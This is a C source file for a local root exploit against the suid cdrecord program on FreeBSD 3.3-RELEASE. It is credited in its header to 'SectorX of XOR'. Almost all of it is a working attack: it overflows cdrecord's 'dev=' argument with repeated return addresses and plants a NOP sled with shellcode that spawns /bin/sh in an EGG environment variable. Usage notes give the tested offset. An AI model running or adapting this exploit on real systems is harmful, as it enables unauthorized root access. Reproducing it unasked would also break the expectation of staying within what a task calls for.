/* 
 freebsd cdrecord exploit by SectorX of XOR [http://xorteam.cjb.net]

 cdrecord seems to be suid root on many different systems, some by default
 and some with purpose. which is why I used a shellcode that spawns a
 shell. this exploit had been successfuly tested against FreeBSD 3.3-RELEASE
 with offset=600.
 
 Greets to XOR Team, to noir for discovering this overflow, and to mudge
           for writing this lovely shellcode.

               --sectorx <sectorx@digitalphobia.com>
*/

#include <stdio.h>
#include <stdlib.h>

#define LENGTH 76
#define EGGIE 500

long esp() { __asm__("movl %esp, %eax"); }
char devilspawn[];

int main(int argc, char *argv[])
{
   long addr;
   char buf[LENGTH];
   char egg[EGGIE];
   int i,offset;
   
   printf("cdrecord exploit by sectorx (FreeBSD)\n");
   if (argc < 2) {
      printf("error: offset must be supplied as a parameter\n");
      printf("*note* FreeBSD 3.3-RELEASE\'s offset is 600\n\n");
      return;
   }
   offset = atoi(argv[1]);
   addr = esp()+offset;
   printf("Using offset 0x%x [%d], eip = 0x%x\n",offset,offset,addr); 
   /* build the overflow string */
   for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr;
   buf[LENGTH-1] = '\0';
   /* build the egg string */
   memset(&egg,0x90,sizeof(egg));
   memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn));
   egg[EGGIE-1] = '\0';
   
   setenv("EGG",egg,1);
   execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0);
}

char devilspawn[]=
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";